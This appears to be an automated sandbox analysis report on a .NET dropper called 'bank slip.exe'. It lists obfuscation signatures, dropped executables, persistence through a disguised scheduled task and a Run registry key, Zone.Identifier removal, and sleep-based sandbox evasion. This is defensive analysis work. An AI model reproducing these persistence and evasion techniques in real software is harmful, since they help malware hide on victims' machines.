                        Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr

                        Data Obfuscation

                        Source: 0.2.bank slip.exe.260f66c.1.raw.unpack, XG.cs | .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                        Source: 0.2.bank slip.exe.6750000.10.raw.unpack, XG.cs | .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | .Net Code: bUZDm6yIUj System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | .Net Code: bUZDm6yIUj System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.bank slip.exe.35c9970.4.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0639A365 push 8B0405CCh; iretd 9_2_0639A36A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD7D37 pushad ; retf 14_2_05CD7D41
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD6468 push eax; retf 14_2_05CD646E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD1778 push es; retf 14_2_05CD177A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD66A0 push esp; retf 14_2_05CD66A6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD30F1 push ds; retf 14_2_05CD30F2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD2838 push ss; retf 14_2_05CD2842
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD2298 push cs; retf 14_2_05CD22A2
                        Source: bank slip.exe | Static PE information: section name: .text entropy: 7.962545979931204
                        Source: mKSjGvfmIulVB.exe.0.dr | Static PE information: section name: .text entropy: 7.962545979931204
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, HxsbFDEGN9yUQ06UPl.cs | High entropy of concatenated method names: 'Gs3vPaIkSA', 'IJsvsucB6B', 'sLevwPL59E', 'Qs5vHgSk4H', 'N5Qvq12YFH', 'vuQv8WOgXG', 'ecNv6ZBQl3', 'E54vWCcZYi', 'lNCvUqeyXf', 'g2RvfMJF8J'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, KDgZwpWiswQerbEGq0d.cs | High entropy of concatenated method names: 'qBDX8eiikioJA', 'UGCQwwCCfLZM3I1ggHM', 'SGOYgFCPK9EHS6B8L8W', 'dUWmDYCXUSL7yAo0bsp', 'BR2flPCm2JHJQ9EXNYO', 'YxSpPhCcTlucnEUgaBC'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RPBv9eW6P3fcSVhK7Q6.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPv7OFCsXB', 'Mu97nTjuua', 'z1l7tpu6DC', 'vOx7B8pPPP', 'IB37y1uRxB', 'B8U7lqkR16', 'qgI7i2dV5v'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, h0ksr6wL5baDLWDeKh.cs | High entropy of concatenated method names: 'p9CXR6CL4I', 'af7XGTu5i1', 'tQar1Xlwxg', 'vY3rYuyqIP', 'IubXfLgSOa', 'stxXLgMs6T', 'qpkXu4RQIw', 'JpDXONZh4f', 'LvnXnpgEBJ', 'OpFXtHpTtq'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, LuAmB1CIIBw0IIen84.cs | High entropy of concatenated method names: 'uUAm34lTZ', 'J4xV4tVZt', 'sSZhNLRPU', 'W1jK3VSLN', 'OWMssnrw4', 'gEpIOrSt2', 'w3DfiEdqesAAVIUP75', 'hIxk1u9ltAxoTB6UJK', 'UU5ronB8n', 'wQy7Z3QBc'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, DhkeECurkuM2ajfWWK.cs | High entropy of concatenated method names: 'uDGr5yCfeX', 'wvWr0dnCB8', 'ymOrZ23Pt6', 'DOUrA7q92l', 'jh6rbEhjb8', 'hIMraGEVxT', 'Mf0rJh45n0', 'ygsreVyp0T', 'jgerkO4JJt', 'smxrjodxxm'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, sfsXZwXfvR3dieCKhH.cs | High entropy of concatenated method names: 'YiU0OufSNm', 'z9i0n4ipEG', 'Lm00tsR1eX', 'hDJ0BkH2R2', 'aUh0ybjvXx', 'mp80lp9Xlo', 'sHS0i91quN', 'zTJ0R5eWM2', 'MFA0cu1dV7', 'smI0GoLdSm'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, J4A3nvmZhShG1GYEQC.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YmCNcMnCeq', 'NtqNGlSwO9', 'KAjNzYD1ME', 'MUyg1ly9Gs', 'BCkgYYXAFy', 'kw5gN7K2t4', 'EenggbBxnZ', 'Jj4kEBgc4dr9geLRrGo'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | High entropy of concatenated method names: 'NXAgpSUtEN', 'K9Cg5riOUp', 'TIbg0eJT1e', 'k7MgZnEZJk', 'eJxgAvWARR', 'bU7gbXc9Ny', 'dFVgaa9mFK', 'XrAgJ5bSYx', 'JpFget3PxG', 'eKJgkR2f2Y'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, wWkMA98MASUoIsFn4D.cs | High entropy of concatenated method names: 'ToString', 'H8e9fTReSf', 'Vjw9HMOSPX', 'aDF9daCfIn', 'oYL9qjQ1RB', 'apo98terv2', 'bYK92qkZ1t', 'EtX96er81k', 'QLW9W5FFeX', 'evq9T7siJM'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, rdZNDk11na0gtIvC30.cs | High entropy of concatenated method names: 'XhBMYqWebf', 'V0eMgcuxni', 'EG7MDlR3Kx', 'TpnM5J3fFy', 'JJOM0yjYnH', 'dMIMATgFr8', 'qHFMbJ0gfv', 'uaOriemfoK', 'I30rRX29EZ', 'hKxrcH4pNx'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, UfiEhAqDBRkf2XDQp0.cs | High entropy of concatenated method names: 'Tk1SUP3Fqb', 'jx4SLLsFla', 'KMiSO7UFh7', 'MCiSnUDoKA', 'xDlSHbs4Gw', 'z6iSdYeAcc', 'iUySqKngX3', 'UaBS8RTyL8', 'GmqS23bauH', 'UM6S6L7QVK'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, W5NXKHMEm5Ij918IP7.cs | High entropy of concatenated method names: 'QgvXk4pUVt', 'l4gXjsLqkl', 'ToString', 'Ar1X5tacoG', 'pVaX0eqs9V', 'FapXZURIcs', 'jTDXAmywlC', 'srlXb6R35Y', 'EVWXamgb3o', 'Tv1XJn0ll6'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, Ep5nCIitlJU5ZYBXvp.cs | High entropy of concatenated method names: 'CXLYaqNn54', 'zCbYJ9oL65', 'SRYYk8HhEw', 'DwDYjeBskG', 'X25YScAJ1X', 'pcjY96OfvN', 'wIrtDp71pY7vyKBqMM', 'cSZ2liZPgDqxvZa89G', 'tAgYYldZAp', 'L04YgIgdft'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, R7bVXuZ7MHjwb6DtgD.cs | High entropy of concatenated method names: 'eukA4bblGb', 'zykAKrCvBd', 'lu0ZdRHtDw', 'uX1ZqZu6wG', 'PhgZ8CiWne', 'KiYZ2XJygS', 'klCZ6uWFWq', 'LluZWZVy6l', 'SOdZTFu2pj', 'P34ZUDQk8m'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, A6VJMMhuqgN8emaiMN.cs | High entropy of concatenated method names: 'SeWrw4Qgns', 'FFNrH1r4c8', 'wnUrdA6X2X', 'cbBrqtpYPA', 'QZbrO4EvhQ', 'JmQr8m3Abt', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, AQKpSGeTUbq29D6fK9.cs | High entropy of concatenated method names: 'sbtbpix1bH', 'nqgb0CoXp0', 'Pu6bAv6J25', 'BfKbaKWa5h', 'k9JbJ2MGvV', 'tkZAyYL42j', 'AYYAlvdiLG', 'PEZAirePfZ', 'LAAAR0XvfB', 'OW5AcMu1R8'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, jmNIBcrHrW0ELPZGY6.cs | High entropy of concatenated method names: 'Er4a5a19cy', 'W8gaZ1reJu', 'qZmab8RrCN', 'eXvbGARaVF', 'bpAbzkKBy3', 'AkWa1C0Q1s', 'EDHaYvUyt3', 'kMoaNPMZf1', 'lw5agQw1EV', 'dIbaDoJbUB'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, fqCqGBPw45OflmtbiV.cs | High entropy of concatenated method names: 'Dispose', 'Du1YcRnvKw', 'a8yNHNyfl3', 'dniooc7Fr2', 'XUXYGAfjdg', 'tgIYz0PaV2', 'ProcessDialogKey', 'IsZN1pZd1V', 'UuqNYWPHYp', 'yFcNN4atNj'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, x0DyjfzCgiXqO6cHLY.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y7UMvd8gfk', 'DVKMSHddrK', 'kPmM9ST8L7', 'SnbMXPSUBM', 'OI1MrFyxmg', 'CeCMMJ4HLF', 'qEMM7kxEmA'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, pssgAdWQVCHOX6LkNrQ.cs | High entropy of concatenated method names: 'xKMMQHqDTo', 'HhPME4AqoJ', 'jTHMmH5CZn', 'GRQMVL2mxa', 'y5eM4D0bLA', 'C6pMhMOOuS', 'nSDMKaYI0c', 'l2wMPJKRub', 'xHCMsL6Ylk', 'D3eMIHfpiI'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYQ0TUYmVRwcWgAP8g.cs | High entropy of concatenated method names: 'nATZVtn5AL', 'PuYZhxnT3k', 'jDtZPfuAGR', 'snQZsK738G', 'iiCZSCNs9d', 'v8IZ9Cv5or', 'jncZXPlJTJ', 'ecbZrciJdh', 'masZM3AWsT', 'RQFZ7vmB5n'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, CdNb8MHDbjsBQ7T66m.cs | High entropy of concatenated method names: 'sghaQllE8V', 'dBpaER9nBx', 'aukamyehLL', 'F3raVC8iUJ', 'nS9a4P3gn5', 'fjwahJ5dle', 'TVdaKIsuI4', 'E1paPKp3Vl', 'PJYaslH4xW', 'lUxaIVusgu'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, kLyHujWW6FSxHLWh9NF.cs | High entropy of concatenated method names: 'ToString', 'xVA7gb6X1l', 'iuV7DAFhmG', 'P6y7pa5xqy', 'yIN75ApCuc', 'C0v70iAb1P', 'GZ97ZfgM7F', 'NJh7At9q6y', 'DKoeVtmHlj4w1TIEG7Q', 'iIpZ9XmqLF1fgNQto3a'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, E93JP.cs | High entropy of concatenated method names: 'O3GewIY79r', 'ozlix3jYlSi', 'rTdmwtTHv1N', 'jqRy6h0g1cX', 'JG6N0SP', 'x9Oe05WPWUp', 'JhSgt5x', 'H9d', 'OBrYDtnZ2J', 'ZQHYbk'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, HxsbFDEGN9yUQ06UPl.cs | High entropy of concatenated method names: 'Gs3vPaIkSA', 'IJsvsucB6B', 'sLevwPL59E', 'Qs5vHgSk4H', 'N5Qvq12YFH', 'vuQv8WOgXG', 'ecNv6ZBQl3', 'E54vWCcZYi', 'lNCvUqeyXf', 'g2RvfMJF8J'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, KDgZwpWiswQerbEGq0d.cs | High entropy of concatenated method names: 'qBDX8eiikioJA', 'UGCQwwCCfLZM3I1ggHM', 'SGOYgFCPK9EHS6B8L8W', 'dUWmDYCXUSL7yAo0bsp', 'BR2flPCm2JHJQ9EXNYO', 'YxSpPhCcTlucnEUgaBC'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RPBv9eW6P3fcSVhK7Q6.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPv7OFCsXB', 'Mu97nTjuua', 'z1l7tpu6DC', 'vOx7B8pPPP', 'IB37y1uRxB', 'B8U7lqkR16', 'qgI7i2dV5v'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, h0ksr6wL5baDLWDeKh.cs | High entropy of concatenated method names: 'p9CXR6CL4I', 'af7XGTu5i1', 'tQar1Xlwxg', 'vY3rYuyqIP', 'IubXfLgSOa', 'stxXLgMs6T', 'qpkXu4RQIw', 'JpDXONZh4f', 'LvnXnpgEBJ', 'OpFXtHpTtq'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, LuAmB1CIIBw0IIen84.cs | High entropy of concatenated method names: 'uUAm34lTZ', 'J4xV4tVZt', 'sSZhNLRPU', 'W1jK3VSLN', 'OWMssnrw4', 'gEpIOrSt2', 'w3DfiEdqesAAVIUP75', 'hIxk1u9ltAxoTB6UJK', 'UU5ronB8n', 'wQy7Z3QBc'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, DhkeECurkuM2ajfWWK.cs | High entropy of concatenated method names: 'uDGr5yCfeX', 'wvWr0dnCB8', 'ymOrZ23Pt6', 'DOUrA7q92l', 'jh6rbEhjb8', 'hIMraGEVxT', 'Mf0rJh45n0', 'ygsreVyp0T', 'jgerkO4JJt', 'smxrjodxxm'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, sfsXZwXfvR3dieCKhH.cs | High entropy of concatenated method names: 'YiU0OufSNm', 'z9i0n4ipEG', 'Lm00tsR1eX', 'hDJ0BkH2R2', 'aUh0ybjvXx', 'mp80lp9Xlo', 'sHS0i91quN', 'zTJ0R5eWM2', 'MFA0cu1dV7', 'smI0GoLdSm'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, J4A3nvmZhShG1GYEQC.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YmCNcMnCeq', 'NtqNGlSwO9', 'KAjNzYD1ME', 'MUyg1ly9Gs', 'BCkgYYXAFy', 'kw5gN7K2t4', 'EenggbBxnZ', 'Jj4kEBgc4dr9geLRrGo'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.cs | High entropy of concatenated method names: 'NXAgpSUtEN', 'K9Cg5riOUp', 'TIbg0eJT1e', 'k7MgZnEZJk', 'eJxgAvWARR', 'bU7gbXc9Ny', 'dFVgaa9mFK', 'XrAgJ5bSYx', 'JpFget3PxG', 'eKJgkR2f2Y'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, wWkMA98MASUoIsFn4D.cs | High entropy of concatenated method names: 'ToString', 'H8e9fTReSf', 'Vjw9HMOSPX', 'aDF9daCfIn', 'oYL9qjQ1RB', 'apo98terv2', 'bYK92qkZ1t', 'EtX96er81k', 'QLW9W5FFeX', 'evq9T7siJM'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, rdZNDk11na0gtIvC30.cs | High entropy of concatenated method names: 'XhBMYqWebf', 'V0eMgcuxni', 'EG7MDlR3Kx', 'TpnM5J3fFy', 'JJOM0yjYnH', 'dMIMATgFr8', 'qHFMbJ0gfv', 'uaOriemfoK', 'I30rRX29EZ', 'hKxrcH4pNx'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, UfiEhAqDBRkf2XDQp0.cs | High entropy of concatenated method names: 'Tk1SUP3Fqb', 'jx4SLLsFla', 'KMiSO7UFh7', 'MCiSnUDoKA', 'xDlSHbs4Gw', 'z6iSdYeAcc', 'iUySqKngX3', 'UaBS8RTyL8', 'GmqS23bauH', 'UM6S6L7QVK'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, W5NXKHMEm5Ij918IP7.cs | High entropy of concatenated method names: 'QgvXk4pUVt', 'l4gXjsLqkl', 'ToString', 'Ar1X5tacoG', 'pVaX0eqs9V', 'FapXZURIcs', 'jTDXAmywlC', 'srlXb6R35Y', 'EVWXamgb3o', 'Tv1XJn0ll6'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, Ep5nCIitlJU5ZYBXvp.cs | High entropy of concatenated method names: 'CXLYaqNn54', 'zCbYJ9oL65', 'SRYYk8HhEw', 'DwDYjeBskG', 'X25YScAJ1X', 'pcjY96OfvN', 'wIrtDp71pY7vyKBqMM', 'cSZ2liZPgDqxvZa89G', 'tAgYYldZAp', 'L04YgIgdft'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, R7bVXuZ7MHjwb6DtgD.cs | High entropy of concatenated method names: 'eukA4bblGb', 'zykAKrCvBd', 'lu0ZdRHtDw', 'uX1ZqZu6wG', 'PhgZ8CiWne', 'KiYZ2XJygS', 'klCZ6uWFWq', 'LluZWZVy6l', 'SOdZTFu2pj', 'P34ZUDQk8m'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, A6VJMMhuqgN8emaiMN.cs | High entropy of concatenated method names: 'SeWrw4Qgns', 'FFNrH1r4c8', 'wnUrdA6X2X', 'cbBrqtpYPA', 'QZbrO4EvhQ', 'JmQr8m3Abt', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, AQKpSGeTUbq29D6fK9.cs | High entropy of concatenated method names: 'sbtbpix1bH', 'nqgb0CoXp0', 'Pu6bAv6J25', 'BfKbaKWa5h', 'k9JbJ2MGvV', 'tkZAyYL42j', 'AYYAlvdiLG', 'PEZAirePfZ', 'LAAAR0XvfB', 'OW5AcMu1R8'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, jmNIBcrHrW0ELPZGY6.cs | High entropy of concatenated method names: 'Er4a5a19cy', 'W8gaZ1reJu', 'qZmab8RrCN', 'eXvbGARaVF', 'bpAbzkKBy3', 'AkWa1C0Q1s', 'EDHaYvUyt3', 'kMoaNPMZf1', 'lw5agQw1EV', 'dIbaDoJbUB'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, fqCqGBPw45OflmtbiV.cs | High entropy of concatenated method names: 'Dispose', 'Du1YcRnvKw', 'a8yNHNyfl3', 'dniooc7Fr2', 'XUXYGAfjdg', 'tgIYz0PaV2', 'ProcessDialogKey', 'IsZN1pZd1V', 'UuqNYWPHYp', 'yFcNN4atNj'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, x0DyjfzCgiXqO6cHLY.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y7UMvd8gfk', 'DVKMSHddrK', 'kPmM9ST8L7', 'SnbMXPSUBM', 'OI1MrFyxmg', 'CeCMMJ4HLF', 'qEMM7kxEmA'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, pssgAdWQVCHOX6LkNrQ.cs | High entropy of concatenated method names: 'xKMMQHqDTo', 'HhPME4AqoJ', 'jTHMmH5CZn', 'GRQMVL2mxa', 'y5eM4D0bLA', 'C6pMhMOOuS', 'nSDMKaYI0c', 'l2wMPJKRub', 'xHCMsL6Ylk', 'D3eMIHfpiI'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYQ0TUYmVRwcWgAP8g.cs | High entropy of concatenated method names: 'nATZVtn5AL', 'PuYZhxnT3k', 'jDtZPfuAGR', 'snQZsK738G', 'iiCZSCNs9d', 'v8IZ9Cv5or', 'jncZXPlJTJ', 'ecbZrciJdh', 'masZM3AWsT', 'RQFZ7vmB5n'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, CdNb8MHDbjsBQ7T66m.cs | High entropy of concatenated method names: 'sghaQllE8V', 'dBpaER9nBx', 'aukamyehLL', 'F3raVC8iUJ', 'nS9a4P3gn5', 'fjwahJ5dle', 'TVdaKIsuI4', 'E1paPKp3Vl', 'PJYaslH4xW', 'lUxaIVusgu'
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, kLyHujWW6FSxHLWh9NF.cs | High entropy of concatenated method names: 'ToString', 'xVA7gb6X1l', 'iuV7DAFhmG', 'P6y7pa5xqy', 'yIN75ApCuc', 'C0v70iAb1P', 'GZ97ZfgM7F', 'NJh7At9q6y', 'DKoeVtmHlj4w1TIEG7Q', 'iIpZ9XmqLF1fgNQto3a'
                        Source: 0.2.bank slip.exe.260f66c.1.raw.unpack, XG.cs | High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                        Source: 0.2.bank slip.exe.6750000.10.raw.unpack, XG.cs | High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                        Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, E93JP.cs | High entropy of concatenated method names: 'O3GewIY79r', 'ozlix3jYlSi', 'rTdmwtTHv1N', 'jqRy6h0g1cX', 'JG6N0SP', 'x9Oe05WPWUp', 'JhSgt5x', 'H9d', 'OBrYDtnZ2J', 'ZQHYbk'
                        Source: C:\Users\user\Desktop\bank slip.exe | File created: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                        Boot Survival

                        Source: C:\Users\user\Desktop\bank slip.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTme

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | delete
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\bank slip.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 2380000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 25C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 24D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 6EE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 7EE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 8080000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Memory allocated: 9080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 1430000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 3000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 2E00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 7850000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 8850000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 89E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Memory allocated: 99E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 1490000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 3060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2340000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 4340000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\bank slip.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4645
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 3217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 727
Source: C:\Users\user\Desktop\bank slip.exe TID: 6196 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656 | Thread sleep count: 4998 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092 | Thread sleep count: 172 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe TID: 7592 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 7916 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 8140 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
